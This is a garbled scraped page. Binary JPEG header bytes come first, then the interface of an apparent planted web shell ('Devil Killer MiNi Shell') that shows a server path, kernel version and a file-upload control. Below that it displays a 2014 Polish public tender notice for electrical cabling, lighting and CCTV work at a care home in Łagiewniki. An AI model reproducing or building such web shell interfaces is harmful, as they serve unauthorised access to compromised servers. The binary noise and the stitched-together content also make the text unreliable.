JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140331/108294-N-2014.html

<p class="kh_header"><b>Chmielnik: Wykonanie linii kablowych n/n zasilających , oświetlenie terenu i kanalizacji teletechnicznej w Domu Pomocy Społecznej w Łagiewnikach.</b><br>
<b>Numer ogłoszenia: 108294 - 2014; data zamieszczenia: 31.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Łagiewnikach , Łagiewniki 73, 26-020 Chmielnik, woj. świętokrzyskie, tel. 041 3542076, faks 041 3543050.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lagiewniki.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie linii kablowych n/n zasilających , oświetlenie terenu i kanalizacji teletechnicznej w Domu Pomocy Społecznej w Łagiewnikach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy robót przewidzianych do wykonania w ramach niniejszego zamówienia przewiduje wykonanie następujących obiektów:
1.Wykonanie linii kablowe niskiego napięcia zasilające istniejące obiekty na terenie DPS :
  - kopanie i  zasypywanie rowów wykonanych w sposób ręczny dla kabli,
  - przeciski pod drogami wykonywać metoda bezinwazyjną (przewiert sterowany),

  - nie dopuszcza się rozbierania istniejących chodników i dróg dojazdowych,
  - układanie kabli  w rowach kablowych ręcznie,
  - wykonanie złączy kablowych,
  - montaż  skrzynek i rozdzielnic do podłoża,
  - przebijanie otworów w ścianach lub stropach i układanie rur winidurowych
     oraz wciąganie przewodów izolowanych do rur,
  - montaż uziomów poziomych w wykopie,
  - badanie i pomiary linii kablowej NN oraz instalacji uziemiającej
  - sprawdzenie samoczynnego wyłączania zasilania.
2. Demontażu istniejących linii napowietrznych NN zasilających obiekty DPS          oraz sieci napowietrznej telefonicznej:
 - demontaż skrzynek i rozdzielni skrzynkowych,
 - demontaż złączy kablowych podwójnych,
 - demontaż słupów żelbetowych linii NN pojedynczych z ustojami,
 - demontaż słupów żelbetowych linii NN rozkracznych,
             - demontaż osprzętu sieciowego i konstrukcji metalowych linii NN - poprzecznik
     przelotowy na słupie leżącym,
             - demontaż osprzętu sieciowego i konstrukcji metalowych linii NN - poprzecznik
    narożny lub krańcowy na słupie leżącym,
              - demontaż przewodów nieizolowanych linii NN o przekroju do 95 mm2 z
      przeznaczeniem na złom,
  - demontaż słupów oświetleniowych,
  - demontaż opraw oświetlenia zewnętrznego na trzpieniu słupa lub wysięgniku,
  - odłączenie kabli  w rozdzielnicach i rozdzielniach,
              - demontaż kabli wielożyłowych  układanych w gruncie kat. III-IV,
  - demontaż napowietrznych przewodów telefonicznych z osprzętem
3.Wykonanie oświetlenia zewnętrznego terenów wzdłuż głównych ciągów komunikacyjnych na słupach wysokości 9,0m, natomiast przy chodnikach na słupach o wysokości 5,0m:
        - kopanie i  zasypywanie rowów wykonanych w sposób ręczny dla kabli,
        - przewierty ręczne dla rur pod obiektami,
                    - ułożenie rur osłonowych,
        - układanie kabli  w rowach kablowych ręcznie,
        - montaż uziomów poziomych w wykopie,
        - montaż  4 skrzynek zewnętrznych z gniazdami 230V i 400 V  (skwer przy budynku
           nr 2A i 3 oraz skwer przed budynkiem Nr 1, z tyłu wiaty estradowej,
        - montaż  skrzynek i rozdzielnic do podłoża,
        - montaż i stawianie słupów oświetleniowych,
        - montaż wysięgników rurowych,
                    - montaż przewodów do opraw oświetleniowych - wciąganie w słupy, rury osłonowe
                       i wysięgniki,
        - montaż opraw oświetlenia zewnętrznego: oprawa oświetlenia zewnętrznego z modułem
           HBLED 1M MW (żarówki o mocy świetlnej 30 W) efektywność świetlna co najmniej
           100Lm/W  44 szt. - szczegółowy opis opraw stanowi załącznik Nr 11,
        - montaż opraw oświetlenia zewnętrznego: oprawa oświetlenia zewnętrznego z modułem
           ALFA HBLED 1M 60T (żarówki o mocy świetlnej 60 W) efektywność świetlna co najmniej
           100Lm/W  20 szt. - szczegółowy opis opraw stanowi załącznik Nr 12,
        - montaż tablicy rozdzielczej - szafka sterownicza w portierni,
        - montaż tablic bezpiecznikowych wnękowych,
        - badanie i pomiary linii kablowej NN oraz instalacji uziemiającej
        - sprawdzenie samoczynnego wyłączania zasilania.
4.Wykonanie kanalizacji teletechnicznej i monitoringu z kamerami monitorującymi       oraz sieci telefonicznej: 
              - budowa kanalizacji kablowej z rur PCW,
        - budowa studni kablowych prefabrykowanych rozdzielczych,
        - ręczne wciąganie kabla,
        - montaż rur osłonowych w słupie,
        - montaż elementów systemu telewizji użytkowej - kamery, UWAGA: kamera nr 12 zostanie
           zamontowana na słupie za budynkiem kaplicy -  Nr słupa S3/11 ( dodatkową długość kabla
           przewidziano w przedmiarach),
        - montaż elementów systemu telewizji użytkowej - telewizor 32 cal FULL HD, 
        - montaż elementów systemu telewizji użytkowej - 16 kanałowy rejestrator HD z wyjściem 
             HDMI z możliwością odtwarzania wszystkich kanałów jednocześnie,
                      - montaż elementów systemu telewizji użytkowej - urządzenie do cyfrowego zapisu obrazu
                           dysk 1TB,
          - zainstalowanie oprogramowania zarządzającego systemami alarmowymi,
          - montaż UPS-a podtrzymania 30 min
          - uruchomienie systemu TVU - linia transmisji danych i parametrów sterujących,
          - montaż  sieci telefonicznej doziemnej w oparciu o kanalizację teletechniczną,
     - założenie od głowicy teletechnicznej 50 par w budynku administracyjnym do przełącznicy
       na budynku kotłowni kabel kanałowy XzTKM pw 25x4x0,5mm,
     - do poszczególnych budynków kabel XzTKMpw 10x2x0,5mm.w nawiązaniu do istniejących
        przyłączy instalacji telefonicznych.
     - wykonanie instalacji antenowej naziemnej telewizji cyfrowej ( anteny kierunkowe) na
        budynku terapii zajęciowej i budynku oddziału Nr I.
Szczegółowy zakres przedmiotu zamówienia określony został w załącznikach nr 1 do SIWZ, 
na który składają się:
1)	załącznik nr 1A, - przedmiar robót, 
2)	załącznik nr 1B - specyfikacja techniczna wykonania i odbioru robót budowlanych,
3)	załącznik nr 1C - projekt budowlano - wykonawczy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.14.00-9, 32.00.00.00-3, 32.32.35.00-8, 34.97.10.00-4, 45.23.23.10-8, 45.31.10.00-0, 45.31.42.00-3, 45.31.56.00-4, 45.31.61.00-6, 50.33.10.00-4, 50.23.21.00-1, 50.33.41.10-9, 51.31.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Zamawiający wymaga wniesienia wadium.
1)	Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości: -  20 000,00 zł (słownie: dwadzieścia tysięcy PLN), przed upływem terminu składania ofert.
2)	wadium może być wnoszone w jednej lub kilku następujących formach określonych                w art. 45 ust. 6 ustawy:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

Wadium wniesione w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego             w Banku PEKAO S.A. Kielce, Nr: 54 1240 4416 1111 0000 4957 1389; z dopiskiem: Wykonanie robót budowlanych pn: Wykonanie linii kablowych n/n zasilających , oświetlenie terenu  i kanalizacji teletechnicznej w Domu Pomocy Społecznej w Łagiewnikach.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca winien wykazać, że  w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie, zgodnie                z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej jedną robotę budowlaną, obejmującą swym zakresem wykonanie zewnętrznych sieci energetycznych i oświetlenia terenu o wartości równej co najmniej kwocie 650 000,00 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien wykazać dysponowanie co najmniej jedną osobą 
do pełnienia funkcji kierownika budowy posiadającą uprawnienia budowlane do kierowania robotami elektrycznymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych  i elektroenergetycznych oraz co najmniej jedną osobą posiadającą uprawnienia budowlane w specjalności konstrukcyjno - budowlanej - telekomunikacyjnej zgodnie z art.14 ustawy z dnia 7 lipca 1994r. Prawo budowlane ( tj. Dz. U z 2013r. poz.1409  z późn. zm.),
W stosunku do obywateli państw członkowskich Unii Europejskiej, w rozumieniu 
art. 4a ustawy z dnia 15 grudnia 2000r. o samorządach architektów, inżynierów budownictwa oraz urbanistów (Dz. U z 2001r. Nr 5, poz. 42 z późn. zm.), uprawnienia budowlane oznaczają również odpowiednie, równoważne kwalifikacje zawodowe 
do wykonywania działalności w budownictwie równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczpospolitej Polskiej, odpowiadające swoim zakresem uprawnieniom, o których mowa w ustawie Prawo budowlane.
W odniesieniu do obywateli państw Członkowskich zastosowanie będzie również miała ustawa z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych 
w państwach członkowskich Unii Europejskiej (Dz. U. z 2008r. nr 63 poz.394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeśli wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż cena złożonej oferty.
W przypadku kwot w walutach obcych Zamawiający dokona ich przeliczenia według średniego kursu NBP z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) formularz ofertowy - załącznik nr 2 do SIWZ,
b) dokument potwierdzający wpłatę wadium,
d) klauzula antykorupcyjna - załącznik nr 10 do SIWZ,
e) harmonogram rzeczowo - finansowy realizowanych robót budowlanych. Harmonogram -  Załącznik Nr 9 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje zmiany Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy polegające na: 
1)	Zmianie rozwiązań technicznych w dokumentacji wykonania zamówienia:
a)	Poprzez wprowadzenie rozwiązań równorzędnych lub funkcjonalnie lepszych 
od określonych w załączniku nr 1 do SIWZ; zmiana ta nie może mieć wpływu na termin realizacji zamówienia i wysokość wynagrodzenia Wykonawcy
b)	Poprzez wprowadzenie nieistotnych odstępstw od dokumentacji określonej 
w załączniku nr 1 do SIWZ; ich wprowadzenie wymaga każdorazowego uzgodnienia z inspektorem nadzoru inwestorskiego i pisemnej zgody Zamawiającego.

2)	Zmianie terminu wykonania  zamówienia jeżeli Zamawiający pozyska środki finansowe na całość zadania w 2014 roku przed podpisaniem umowy , termin wykonania zamówienia może zostać skrócony na etapie podpisywania umowy do dnia 31.08.2014r. lub stosownym aneksem po uzgodnieniu z Wykonawcą nowego terminu wykonania zamówienia. Z uzgodnienia nowego terminu powinien być spisany protokół podpisany przez Zamawiającego i Wykonawcę.

3)	Zmianie terminu zakończenia robót, spowodowanego warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót lub warunkami geologicznymi, wystąpieniem wykopalisk i odkryć archeologicznych lub historycznych, niewybuchów lub niewypałów, wydłużeniem się postępowań administracyjnych związanych z wykonaniem przedmiotu umowy.

4)	Zmianie dotyczącej obniżenia wysokości wynagrodzenia wskutek zmniejszenia zakresu przedmiotu zamówienia.

5)	Zmianie kierownika budowy, jedynie za uprzednią pisemną zgodą Zamawiającego, pod warunkiem, że powołana do pełnienia ww. obowiązków osoba będzie spełniała wymagania określone w specyfikacji istotnych warunków zamówienia dla danej funkcji, w następujących przypadkach:
a)	śmierci, choroby lub innych zdarzeń losowych;
b)	jeżeli zmiana kierownika budowy stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy.
6)	Zmianie wynikającej z działania siły wyższej.

7)	Zmianie wynikającej ze zmian w zakresie obowiązujących przepisów prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lagiewniki.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Łagiewnikach, Łagiewniki 73, 26 - 020 Chmielnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2014 godzina 09:00, miejsce: Ofertę należy złożyć bezpośrednio lub za pośrednictwem operatora pocztowego 
lub firmy kurierskiej w kasie Domu Pomocy Społecznej w Łagiewnikach, Łagiewniki 73,   26 - 020 Chmielnik ..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
